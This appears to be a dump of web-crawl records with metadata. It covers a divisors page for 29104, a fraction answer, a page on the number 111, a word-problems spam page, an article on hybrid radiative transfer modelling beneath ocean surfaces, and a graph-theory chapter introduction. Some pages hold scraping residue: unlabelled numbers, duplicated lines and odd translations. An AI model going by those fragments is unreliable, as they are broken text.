29104\n\nSince 29104 divided by -7276 is a whole number, -7276 is a factor of 29104\n\nSince 29104 divided by -3638 is a whole number, -3638 is a factor of 29104\n\nSince 29104 divided by -1819 is a whole number, -1819 is a factor of 29104\n\nSince 29104 divided by -1712 is a whole number, -1712 is a factor of 29104\n\nSince 29104 divided by -856 is a whole number, -856 is a factor of 29104\n\nSince 29104 divided by -428 is a whole number, -428 is a factor of 29104\n\nSince 29104 divided by -272 is a whole number, -272 is a factor of 29104\n\nSince 29104 divided by -214 is a whole number, -214 is a factor of 29104\n\nSince 29104 divided by -136 is a whole number, -136 is a factor of 29104\n\nSince 29104 divided by -107 is a whole number, -107 is a factor of 29104\n\nSince 29104 divided by -68 is a whole number, -68 is a factor of 29104\n\nSince 29104 divided by -34 is a whole number, -34 is a factor of 29104\n\nSince 29104 divided by -17 is a whole number, -17 is a factor of 29104\n\nSince 29104 divided by -16 is a whole number, -16 is a factor of 29104\n\nSince 29104 divided by -8 is a whole number, -8 is a factor of 29104\n\nSince 29104 divided by -4 is a whole number, -4 is a factor of 29104\n\nSince 29104 divided by -2 is a whole number, -2 is a factor of 29104\n\nSince 29104 divided by -1 is a whole number, -1 is a factor of 29104\n\nSince 29104 divided by 1 is a whole number, 1 is a factor of 29104\n\nSince 29104 divided by 2 is a whole number, 2 is a factor of 29104\n\nSince 29104 divided by 4 is a whole number, 4 is a factor of 29104\n\nSince 29104 divided by 8 is a whole number, 8 is a factor of 29104\n\nSince 29104 divided by 16 is a whole number, 16 is a factor of 29104\n\nSince 29104 divided by 17 is a whole number, 17 is a factor of 29104\n\nSince 29104 divided by 34 is a whole number, 34 is a factor of 29104\n\nSince 29104 divided by 68 is a whole number, 68 is a factor of 29104\n\nSince 29104 divided by 107 is a whole number, 107 is a factor of 29104\n\nSince 29104 divided by 136 is a whole number, 136 is a factor of 29104\n\nSince 29104 divided by 214 is a whole number, 214 is a factor of 29104\n\nSince 29104 divided by 272 is a whole number, 272 is a factor of 29104\n\nSince 29104 divided by 428 is a whole number, 428 is a factor of 29104\n\nSince 29104 divided by 856 is a whole number, 856 is a factor of 29104\n\nSince 29104 divided by 1712 is a whole number, 1712 is a factor of 29104\n\nSince 29104 divided by 1819 is a whole number, 1819 is a factor of 29104\n\nSince 29104 divided by 3638 is a whole number, 3638 is a factor of 29104\n\nSince 29104 divided by 7276 is a whole number, 7276 is a factor of 29104\n\nSince 29104 divided by 14552 is a whole number, 14552 is a factor of 29104\n\n## What are the multiples of 29104?\n\nMultiples of 29104 are all integers divisible by 29104 , i.e. the remainder of the full division by 29104 is zero. There are infinite multiples of 29104. The smallest multiples of 29104 are:\n\n0 : in fact, 0 is divisible by any integer, so it is also a multiple of 29104 since 0 × 29104 = 0\n\n29104 : in fact, 29104 is a multiple of itself, since 29104 is divisible by 29104 (it was 29104 / 29104 = 1, so the rest of this division is zero)\n\n58208: in fact, 58208 = 29104 × 2\n\n87312: in fact, 87312 = 29104 × 3\n\n116416: in fact, 116416 = 29104 × 4\n\n145520: in fact, 145520 = 29104 × 5\n\netc.\n\n## Is 29104 a prime number?\n\nIt is possible to determine using mathematical techniques whether an integer is prime or not.\n\nfor 29104, the answer is: No, 29104 is not a prime number.\n\n## How do you determine if a number is prime?\n\nTo know the primality of an integer, we can use several algorithms. The most naive is to try all divisors below the number you want to know if it is prime (in our case 29104). We can already eliminate even numbers bigger than 2 (then 4 , 6 , 8 ...). Besides, we can stop at the square root of the number in question (here 170.599 ). Historically, the Eratosthenes screen (which dates back to Antiquity) uses this technique relatively effectively.\n\nMore modern techniques include the Atkin screen, probabilistic tests, or the cyclotomic test."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.91708577,"math_prob":0.9913478,"size":5191,"snap":"2021-21-2021-25","text_gpt3_token_len":1647,"char_repetition_ratio":0.37998843,"word_repetition_ratio":0.19075145,"special_character_ratio":0.42939705,"punctuation_ratio":0.09341637,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99986684,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-17T01:05:23Z\",\"WARC-Record-ID\":\"<urn:uuid:8c75e436-146a-4ed9-9109-2917c12941fe>\",\"Content-Length\":\"24129\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e6b2b72a-ed94-4180-8821-8a944e713d09>\",\"WARC-Concurrent-To\":\"<urn:uuid:d6a1b586-dc11-45b0-b74a-b2290b917ff1>\",\"WARC-IP-Address\":\"104.21.88.17\",\"WARC-Target-URI\":\"https://calculomates.com/en/divisors/of/29104\",\"WARC-Payload-Digest\":\"sha1:6IKPPWYHFI2UCBHTYAV3XHUXQ27F4YB7\",\"WARC-Block-Digest\":\"sha1:MBW75WZQVZANBFS2VUJK3O2FRATCV6VZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243991921.61_warc_CC-MAIN-20210516232554-20210517022554-00075.warc.gz\"}"} |
https://answers.everydaycalculation.com/multiply-fractions/8-49-times-35-40 | [
"Solutions by everydaycalculation.com\n\n## Multiply 8/49 with 35/40\n\nThis multiplication involving fractions can also be rephrased as \"What is 8/49 of 35/40?\"\n\n8/49 × 35/40 is 1/7.\n\n#### Steps for multiplying fractions\n\n1. Simply multiply the numerators and denominators separately:\n2. 8/49 × 35/40 = 8 × 35/49 × 40 = 280/1960\n3. After reducing the fraction, the answer is 1/7\n\nMathStep (Works offline)",
null,
"Download our mobile app and learn to work with fractions in your own time:"
] | [
null,
"https://answers.everydaycalculation.com/mathstep-app-icon.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8491167,"math_prob":0.96834683,"size":385,"snap":"2021-31-2021-39","text_gpt3_token_len":133,"char_repetition_ratio":0.15223098,"word_repetition_ratio":0.0,"special_character_ratio":0.4077922,"punctuation_ratio":0.07317073,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98375845,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-28T04:15:01Z\",\"WARC-Record-ID\":\"<urn:uuid:a7bd406d-c56c-488e-9944-a20e5020d37d>\",\"Content-Length\":\"6883\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c311584c-605b-4bdb-ad85-c822ab609972>\",\"WARC-Concurrent-To\":\"<urn:uuid:2186f0c5-cade-417d-a333-5c8a123dcf6e>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/multiply-fractions/8-49-times-35-40\",\"WARC-Payload-Digest\":\"sha1:UDSO4ASZMYRSYVKUNK4FN7FDP3F735PI\",\"WARC-Block-Digest\":\"sha1:AM4TKVF2X2NYHNOLCSARO6ILJOCURDAK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780060201.9_warc_CC-MAIN-20210928032425-20210928062425-00119.warc.gz\"}"} |
http://www.numtoword.com/111-number-english.html | [
"# How to Write, Spell, Say 111 in English Words\n\n111 in English, Spelling for 111 in English , number to words for 111\n\none hundred eleven\n\n(Live) Coronavirus Pandemic 24/7: Death Toll, Infections, Recoveries and Real Time Counter:",
null,
"Number\n\n## How to write 111 Number in Currency Spelling?\n\n• AUD => one hundred eleven Australian dollars\n• BGN => one hundred eleven leva\n• BWP => one hundred eleven pula\n• GBP => one hundred eleven pounds sterling\n• CNY => one hundred eleven Chinese yuan\n• CHF => one hundred eleven Swiss francs\n• CZK => one hundred eleven Czech koruny\n• EEK => one hundred eleven kroonid\n• EUR => one hundred eleven euro\n• GHS => one hundred eleven Ghana cedis\n• GMD => one hundred eleven dalasi\n• HKD => one hundred eleven Hong Kong dollars\n• HRK => one hundred eleven kuna\n• HUF => one hundred eleven forint\n• INR => one hundred eleven Indian rupees\n• JMD => one hundred eleven Jamaica dollars\n• JPY => one hundred eleven Japanese yen\n• KES => one hundred eleven Kenyan shillings\n• LRD => one hundred eleven Liberian dollars\n• LSL => one hundred eleven maloti\n• LTL => one hundred eleven litai\n• LVL => one hundred eleven lati\n• MGA => one hundred eleven ariaries\n• MUR => one hundred eleven Mauritian rupees\n• MXN => one hundred eleven Mexican pesos\n• MWK => one hundred eleven Malawian kwacha\n• NAD => one hundred eleven Namibian dollars\n• NGN => one hundred eleven naira\n• NZD => one hundred eleven New Zealand dollars\n• PGK => one hundred eleven kina\n• PHP => one hundred eleven Philippine pesos\n• PKR => one hundred eleven Pakistani rupees\n• PLN => one hundred eleven zlotys\n• RON => one hundred eleven Romanian lei\n• RSD => one hundred elevenSerbian dinars\n• RUB => one hundred eleven Russian rubles\n• RWF => one hundred eleven Rwandese francs\n• SDG => one hundred eleven Sudanese pounds\n• SGD => one hundred eleven Singapore dollars\n• SLL => one hundred eleven leones\n• SZL => one hundred eleven emalangeni\n• THB => one hundred eleven baht\n• TRY => one hundred eleven Turkish lira\n• TTD => one hundred eleven Trinidad and Tobago dollars\n• TZS => one hundred eleven Tanzanian shillings\n• UAH => one hundred eleven hryvnia\n• UGX => one hundred eleven Uganda shillings\n• USD => one hundred eleven U.S. dollars\n• ZMK => one hundred eleven Zambian kwacha\n• ZMK => one hundred eleven Zambian kwacha\n• ZWL => one hundred eleven Zimbabwe dollars\n\n## Is 111 A Prime Number?\n\nNo. This is not a Prime Number...\n\n## Prime Factors Of 111 / Prime Factorization Of 111?\n\nDetermined equcation for number 111 factorization is 37 * 3\n\nThe prime factors of number 111 are: 37 *3\n\n## Is 111 A Composite Number?\n\n111 is a composite number, because it has more divisors than 1 and itself.\n\n## Is 111 An Even Number?\n\nNo. This is a not a Even Number\n\n## Is 111 An Odd Number?\n\nYes. This is a Odd Number.\n\n1. × 100\n\n12321\n\n1367631\n\n## Square Root Of 111?\n\nSquare root of 111= 10.535653752853\n\n## Cube Root Of 111?\n\nThe cubed root of three ∛111 =4.8058955337053\n\n3\n\n3\n\n111\n\n## Palindromic Number\n\n111 is the same when its digits are reversed! That makes it a palindromic number.\n\n348.71678454847\n\n4.7095302013123\n\n2.0453229787867\n\nCXI\n\n## 111 seconds converted to days, hours, minutes and seconds\n\n0 days 00 hours 01 min 51 sec\n\n11011112\n\n6f16\n\n1578\n\n#111\n\n## Length\n\n111 kilometre =\n\n111000 meter\n\n11100000 Centimetre\n\n111000000 Millimetre\n\n111000000000 Micrometer\n\n1.11E+14 Nanometer\n\n68.972181 Mile\n\n121391.03855951 Yard\n\n364173.11567854 Foot\n\n4370077.3881425 Inch\n\n59.935186640831 Nautical mile\n\n111 Metre =\n\n0.111 kilometre\n\n11100 Centimetre\n\n111000 Millimetre\n\n111000000 Micrometer\n\n111000000000 Nanometer\n\n0.068972181 Mile\n\n121.39103856 Yard\n\n364.17311568 Foot\n\n4370.07738816 Inch\n\n0.059935186641071 Nautical mile\n\n111 Centimetre =\n\n0.00111 kilometre\n\n1.11 Metre\n\n1110 Millimetre\n\n1110000 Micrometer\n\n1110000000 Nanometer\n\n0.0006897207 Mile\n\n1.2139071 Yard\n\n3.6417324 Foot\n\n43.700811 Inch\n\n0.0005993556 Nautical mile"
] | [
null,
"http://www.numtoword.com/youtube/corana.jpg",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.7725482,"math_prob":0.90144956,"size":939,"snap":"2020-10-2020-16","text_gpt3_token_len":263,"char_repetition_ratio":0.14331551,"word_repetition_ratio":0.06896552,"special_character_ratio":0.3109691,"punctuation_ratio":0.14285715,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96963054,"pos_list":[0,1,2],"im_url_duplicate_count":[null,8,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-05T22:32:46Z\",\"WARC-Record-ID\":\"<urn:uuid:fd9b5304-50f5-49f8-83ae-2aa0bfbed0d5>\",\"Content-Length\":\"31458\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0a541915-16b1-45ef-8e39-bde514e1a06f>\",\"WARC-Concurrent-To\":\"<urn:uuid:bd8328fa-f22a-43f0-a2c8-763ab15b775f>\",\"WARC-IP-Address\":\"107.180.26.181\",\"WARC-Target-URI\":\"http://www.numtoword.com/111-number-english.html\",\"WARC-Payload-Digest\":\"sha1:EKSOM3WRZNWQFYYGCZNYVAVZ6LBMVVPC\",\"WARC-Block-Digest\":\"sha1:37JIBPHWW3E25XJGYPVOA7HYTPNDH3XK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585371611051.77_warc_CC-MAIN-20200405213008-20200406003508-00360.warc.gz\"}"} |
https://kot-kota.ru/sixth-grade-math-word-problems-712.html | [
"# Sixth Grade Math Word Problems\n\nTags: Dissertation Sur Antigone De SophocleApartheid Cause And Effect EssayComputer Homework HelpPersonal Essay HelpTerm Paper Music TherapySociety Changing EssayImportance Of Study Habits EssaysSensation And Perception Conclusion EssayEssay On A Trip To Space StationAssignment Business Law\n\nYou may select between regrouping and non-regrouping type of problems.\n\nSubtraction Word Problems Worksheets Using 1 Digit These subtraction word problems worksheets will produce 1 digit problems, with ten problems per worksheet.\n\nSubtraction Word Problems Worksheets Using 2 Digits These subtraction word problems worksheets will produce 2 digits problems, with ten problems per worksheet.\n\nAddition and Subtraction Word Problems Worksheets Using 1 Digit These addition and subtraction word problems worksheets will produce 1 digit problems, with ten problems per worksheet.\n\nOur word problems worksheets are free to download, easy to use, and very flexible.\n\nThese word problems worksheets are a great resource for children in 3rd Grade, 4th Grade, and 5th Grade.\n\nAddition Word Problems Worksheets Using 2 Digits with 3 Addends These addition word problems worksheets will produce 2 digits problems with three addends, with ten problems per worksheet.\n\nAddition Word Problems Worksheets 2 Digits Missing Addends These addition word problems worksheet will produce 2 digits problems with missing addends, with ten problems per worksheet.\n\nAddition Word Problems Worksheets Using 1 Digit with 2 Addends These addition word problems worksheets will produce 1 digit problems with two addends, with ten problems per worksheet.\n\n• ###### Dynamically Created Word Problems -\n\nThese Word Problems Worksheets are perfect for practicing solving and. These word problems worksheets are appropriate for 4th Grade, 5th Grade, and 6th.…\n\n• ###### Th grade Math Word Problems - LiveBinder\n\nThis LiveBinder has a great collection of math word problems for 6th graders. Includes worksheets, links to pdfs and some background as to the development.…\n\n• ###### Th Grade Math Word Problems solutions, examples, videos\n\nTh Grade Math Word Problems, ratio and proportions using bar models, tape diagrams or block diagrams, examples with step by step solutions, How to solve.…\n\n• ###### Th Grade Math Word Problems - Pinterest\n\nSolving math problems can intimidate sixth-graders, but by using a few simple formulas, students can easily calculate answers to worksheet questions.…\n\nLearn sixth grade math for free—ratios, exponents, long division, negative numbers. and subtracting decimals word problems Arithmetic operationsMultiplying.…\n\n• ###### Th-Grade Math Word Problems - ThoughtCo\n\nSolving math problems can intimidate sixth-graders, but by using a few simple formulas, students can easily calculate answers to worksheet.…"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8639851,"math_prob":0.7961942,"size":3077,"snap":"2021-31-2021-39","text_gpt3_token_len":616,"char_repetition_ratio":0.24341035,"word_repetition_ratio":0.2646421,"special_character_ratio":0.18329541,"punctuation_ratio":0.102514505,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9960577,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-24T13:40:48Z\",\"WARC-Record-ID\":\"<urn:uuid:02053f1c-c0df-4b94-a8ec-93a84cbf3107>\",\"Content-Length\":\"34735\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5f7e5510-2a92-4e02-9193-26489f4ecc99>\",\"WARC-Concurrent-To\":\"<urn:uuid:d213fce0-610a-4651-8762-b565c164a87f>\",\"WARC-IP-Address\":\"172.67.195.82\",\"WARC-Target-URI\":\"https://kot-kota.ru/sixth-grade-math-word-problems-712.html\",\"WARC-Payload-Digest\":\"sha1:SLKUKSK5Z2PCHXARJYTPGCSHPAZTRHZJ\",\"WARC-Block-Digest\":\"sha1:BGWGGKSFELZWLHETCM32MW2EWD4HPHN2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046150266.65_warc_CC-MAIN-20210724125655-20210724155655-00435.warc.gz\"}"} |
https://www.thermopedia.com/ru/content/259/ | [
"Пользователь: Guest\nКоличество просмотров:\n35979\n\n\n## HYBRID METHOD\n\nTo better solve the radiative transfer equations in specific situations, people have used hybrid radiative transfer models that combine the computational power of more than one of the radiative transfer methods introduced above. For example, Zhai et al. (2008a,b) reported a hybrid matrix operator-Monte Carlo (HMOMC) method that is optimized for simulations of the light field under dynamic ocean surfaces. Ota et al. (2010) reported a hybrid matrix formulation that uses both the discrete ordinate and matrix operator methods. In this article, we will only introduce the HMOMC method.\n\nAlmost all radiative transfer methods assume that the coupled atmosphere-ocean system is static. The air-sea interface is considered to be either flat or roughened, but is treated using the static Cox-Munk wave slope model, which gives reasonably good results for understanding the time-averaged light field. However, the real light field in a coupled atmosphere-ocean system (CAOS), especially that just beneath the air-sea interface, is highly dynamic and dominated by the instantaneous wavy ocean surface above it. To solve for the dynamic radiation field using conventional radiative transfer (RT) methods in this scenario, one has to run the complete RT model for each individual frame, which makes it highly inefficient and virtually impractical. Recently, as part of the effort in the Radiance in a Dynamic Ocean (RaDyO) project, a hybrid method (Zhai et al., 2008b) combining the power of both the matrix operator and Monte Carlo methods has been reported to make dynamic simulations practical.\n\nThe dynamic CAOS is inherently a 3D system since horizontal inhomogeneity in the light field is introduced by the instantaneous wave slope field. Therefore, the 1D matrix operator formalism has to be extented to 3D, where an impulse-response function is not only a function of the impulse and response directions ni and nr, but is also a function of the impulse and response positions ri and rr. It can be compactly written as a 16-dimensional matrix F(r)(i)), where ρ = (r,n) denotes a combination of both the position and direction vectors. Each subset of this multidimensional matrix is in turn a 2D 4 × 4 Mueller matrix. The dynamic nature of the system introduces an extra temporal argument t, such that an impulse-response function becomes F(r)(i);t). Keep in mind here that working on matrices implies that the angular and spatial dimensions are both discretized into grids. Specifically, the horizontal dimension has to be considered finite (unlike other methods that assume a semi-infinite plane-parallel system) with positions r being discretized grid points in the finite horizontal domain. Boundary conditions, such as simple periodic boundary conditions, are used to extend the finite computational domain to infinity.\n\nSimilar to the conventional matrix operator method, the hybrid method expresses the dynamic polarized underwater light field Id(d);t) as",
null,
"(1)\n\nwhere d denotes the depth of the detector below the ocean surface, and D0d(d)(0);t) is the effective detector response function that relates a detector response at a given ρ(d) to the incident light field at any ρ(0). The temporal variation in the light field is explicitly shown in Eq. (1). To describe D0d(d)(0);t) in the matrix operator formalism, it is most convenient to partition the CAOS into three parts, namely, the atomsphere, the ocean surface, and the ocean along with its bottom. The top of the atmosphere, the bottom of the atmosphere/the top of the surface, the bottom of the surface/the top of the ocean, and the bottom of the ocean are labeled as levels 0, 1, 2, and 3, respectively in Fig. 1. The level of the underwater detector, d, is also shown. With this partition, D0d(d)(0);t) in Eq. (1) can be expanded and compactly written as",
null,
"(2)\n\nwhere only the first two orders of coupling terms are explicitly shown. Arguments ρ(r) and ρ(i) are suppressed for simplicity. These coupling terms are illustrated in Fig. 1 as well.",
null,
"Figure 1. Partition of the CAOS into three parts, and the first two orders of coupling terms.\n\nTo design a more computationally efficient method for the light field immediately below the air-sea interface in a dynamic CAOS, note that the dynamic characteristics of the system are mainly carried by the surface layer, where the temporal variations can be much less than a second. Therefore, the impulse-response functions in this layer [such as T12(r)(i);t) and R21(r)(i);t)] have to be considered dynamic. On the other hand, the optical properties in the atmosphere and ocean parts are at most slowly varying on the order of minutes, if turbulence is not considered. Therefore, these two parts can be treated statically, and the corresponding impulse-response functions can be considered temporally independent; for example, T01(r)(i)) and R01(r)(i)). With these properties considered, Eq. (2) reduces to",
null,
"(3)\n\nIn the conventional matrix operator method, one has to first calculate the radiative transfer (i.e., the impulse-response functions) for infinitesimally thin layers, and then couple these functions to get it for the whole atmosphere/ocean system. In the HMOMC model, the whole atmosphere is treated as an integrated system, whose 3D impulse-response functions are precalculated from 3D Monte Carlo calculations (Zhai et al., 2008a). This applies to the whole ocean, including its bottom as well. These static atmospheric and oceanic impulse-response functions (for example, T01, T12, and D2d) are then coupled to those in the dynamic surface layer [for example, T12(t) and R21(t)], which are determined by Fresnel formulas. The coupling is done by a 3D expansion of the matrix operator method as previously mentioned to get the dynamic underwater light field. Using this coupling scheme, no computational efforts are wasted in unnecessary calculations of radiative transfer in the virtually static atmosphere and ocean parts at all instances in time. This makes it much more efficient than a conventional RT method (for example, a direct 3D Monte Carlo method) for the purpose of calculating the dynamic underwater light field just below the air-sea interface.\n\nA dual-grid scheme reported by You et al. (2009) can be employed to further improve the computational efficiency of the HMOMC method. Notice that the wavelengths of typical gravity and capillary waves in real ocean surfaces are on the order of centimeters or even millimeters. To resolve these wave structures, one has to discretize the horizontal computational domain into very small grids, which makes the computation and the storage of necessary impulse-response functions prohibitively difficult. On the other hand, the optical properties of the atmosphere and ocean are usually horizontaly homogeneous on a much larger scale, and can be discretized into coarser grids. A grid size on the order of meters is sufficient for open waters, and can be smaller for relatively dyamic coastal waters. In the dual-grid scheme, the atmosphere and ocean parts are discretized into larger medium grids, while the ocean surface is discretized into smaller surface grids (Fig. 2). In this scheme, there are multiple surface grids that correspond to the same medium grid.",
null,
"Figure 2. Discretizations of the computational domain in the single-grid scheme (a), and the dual-grid scheme (b) (adapted from You et al. 2009).\n\nSpecial attention is needed to appropriately couple the medium and surface grids. For example, in the coupling term D2d · T12(t) · T01, the same medium impulse-response functions T01(r)(i)) and D2d(r)(i)) will be used for all surface grids that correspond to the same medium grid. This dual-grid scheme substantially reduces the required computational resources and satisfactorily keeps the accuracy of the computed light field. Figure 3 shows angular and spatial distributions of the downwelling radiance field as viewed by an array of nine detectors immediately beneath a dynamic ocean surface computed from the HMOMC method. The detectors are about 1.4 m away from each other. The horizontal inhomogeneity is obvious in Fig. 3. The temporal variation can be seen in the simulated “time series” of the radiance field (You et al., 2009).",
null,
"Figure 3. Simulated angular and spatial distributions of the radiance field immediately beneath a dynamic ocean surface (adapted from You et al., 2009).\n\nA fast irradiance version of the HMOMC method (Fig. 4, You et al., 2010) has been developed to simulate the high-frequency temporal fluctuations in the downwelling irradiance beneath a dynamic ocean surface. Using this fast model, it is possible to simulate the temporal variations in the underwater downwelling irradiance Ed(t) to within several meters of the ocean surface with an extremely high sampling rate. In the simulated 10-min-long time series of Ed(t) with a sampling rate of 1 kHz, the probability densities of the normalized instantaneous downwelling irradiance Ed(t) /⟨Ed⟩ at various depths are consistent with their counterparts from field measurements made during the RaDyO Santa Barbara Channel experiment.",
null,
"Figure 4. Simulated and measured probability density functions of the normalized downwelling irradiance at various depths (adapted from You et al. 2010).\n\n#### REFERENCES\n\nOta, Y., Higurashi, A., Nakajima, T., and Yokota, T, Matrix formulations of radiative transfer including the polarization effect in a coupled atmosphere-ocean system, J. Quant. Spectr. Radiat. Transfer, vol. 111, pp. 878-894, 2010.\n\nYou, Y., Zhai, P.-W., Kattawar, G. W., and Yang, P., Polarized radiance fields under a dynamic ocean surface: a three-dimensional radiative transfer solution, Appl. Opt., vol. 48, no. 16, pp. 3019-3029, 2009.\n\nYou, Y., Stramski, D., Darecki, M., and Kattawar, G. W., Modeling of wave-induced irradiance fluctuations at near-surface depths in the ocean: a comparison with measurements, Appl. Opt., vol. 49, no. 6, pp. 1041-1053, 2010.\n\nZhai, P.-W., Kattawar, G. W., and Yang, P., Impulse response solution to the three-dimensional vector radiative transfer equation in atmosphere-ocean systems. I. Monte Carlo method, Appl. Opt., vol. 47, pp. 1037-1047, 2008a.\n\nZhai, P.-W., Kattawar, G. W., and Yang, P., Impulse response solution to the three-dimensional vector radiative transfer equation in atmosphere-ocean systems. II. The hybrid matrix operator-Monte Carlo method, Appl. Opt., vol. 47, pp. 1063-1071, 2008b.\n\n#### Использованная литература\n\n1. Ota, Y., Higurashi, A., Nakajima, T., and Yokota, T, Matrix formulations of radiative transfer including the polarization effect in a coupled atmosphere-ocean system, J. Quant. Spectr. Radiat. Transfer, vol. 111, pp. 878-894, 2010.\n2. You, Y., Zhai, P.-W., Kattawar, G. W., and Yang, P., Polarized radiance fields under a dynamic ocean surface: a three-dimensional radiative transfer solution, Appl. Opt., vol. 48, no. 16, pp. 3019-3029, 2009.\n3. You, Y., Stramski, D., Darecki, M., and Kattawar, G. W., Modeling of wave-induced irradiance fluctuations at near-surface depths in the ocean: a comparison with measurements, Appl. Opt., vol. 49, no. 6, pp. 1041-1053, 2010.\n4. Zhai, P.-W., Kattawar, G. W., and Yang, P., Impulse response solution to the three-dimensional vector radiative transfer equation in atmosphere-ocean systems. I. Monte Carlo method, Appl. Opt., vol. 47, pp. 1037-1047, 2008a.\n5. Zhai, P.-W., Kattawar, G. W., and Yang, P., Impulse response solution to the three-dimensional vector radiative transfer equation in atmosphere-ocean systems. II. The hybrid matrix operator-Monte Carlo method, Appl. Opt., vol. 47, pp. 1063-1071, 2008b."
] | [
null,
"https://www.thermopedia.com/content/4936/img5.gif",
null,
"https://www.thermopedia.com/content/4936/img9.gif",
null,
"https://www.thermopedia.com/content/4936/1.gif",
null,
"https://www.thermopedia.com/content/4936/img16.gif",
null,
"https://www.thermopedia.com/content/4936/2.gif",
null,
"https://www.thermopedia.com/content/4936/3.jpg",
null,
"https://www.thermopedia.com/content/4936/4.gif",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.86753273,"math_prob":0.95281905,"size":11869,"snap":"2023-40-2023-50","text_gpt3_token_len":2787,"char_repetition_ratio":0.13409187,"word_repetition_ratio":0.18853363,"special_character_ratio":0.22925268,"punctuation_ratio":0.17781541,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9771131,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],"im_url_duplicate_count":[null,2,null,2,null,2,null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-02T20:49:57Z\",\"WARC-Record-ID\":\"<urn:uuid:c5cffdbc-b6b0-4a5b-92ba-0499d1765713>\",\"Content-Length\":\"31075\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c6f17033-8598-40f1-9f41-b1f19fe024bf>\",\"WARC-Concurrent-To\":\"<urn:uuid:40209223-253c-4c3c-bb25-5860c7feb799>\",\"WARC-IP-Address\":\"169.59.241.43\",\"WARC-Target-URI\":\"https://www.thermopedia.com/ru/content/259/\",\"WARC-Payload-Digest\":\"sha1:QJLWAKOAAYK4KKDY2TUWJCGOCG2C4TWJ\",\"WARC-Block-Digest\":\"sha1:X6PFLFQ24G55YF42FOBYL7FSY24IYYAO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100452.79_warc_CC-MAIN-20231202203800-20231202233800-00668.warc.gz\"}"} |
https://flylib.com/books/en/2.300.1/graphs.html | [
"# Graphs\n\nSo far we have dealt only with linear structures and trees. A linear structure can be considered a special case of a tree, where every node (except for the single leaf) has exactly one child. Just as trees generalize linear structures, graphs generalize trees (Figure 15-1). The key difference between trees and graphs is that, in a graph, there may be more than one path between two nodes.\n\nFigure 15-1. A linear structure (left) is a special case of a tree (middle), which is in turn a special case of a graph (right).",
null,
"This chapter begins with discussions of graph terminology (Section 15.1), representation (Section 15.2), and traversal (Section 15.3). The remaining sections present several algorithms related to graphs. An incredible variety of computational problems can be phrased in terms of graphs. For example:\n\n• Consider a set of tasks in a complicated cooking or industrial fabrication process. Some of the tasks have others as prerequisites. In what order can the tasks be performed? This is the topological sorting problem, addressed in Section 15.4.\n• What is the shortest driving route from Los Angeles to Chicago? Section 15.5 covers algorithms for finding shortest paths.\n• Given a set of computers in various locations in a building, how can they be connected with the least amount of cable? This is the problem of finding a minimum spanning tree, discussed in Section 15.6.",
null,
"Data Structures and Algorithms in Java\nISBN: 0131469142\nEAN: 2147483647\nYear: 2004\nPages: 216\nAuthors: Peter Drake\n\nSimilar book on Amazon",
null,
""
] | [
null,
"https://flylib.com/books/2/300/1/html/2/images/15fig01.jpg",
null,
"https://flylib.com/icons/4583-small.jpg",
null,
"https://flylib.com/media/images/top.png",
null
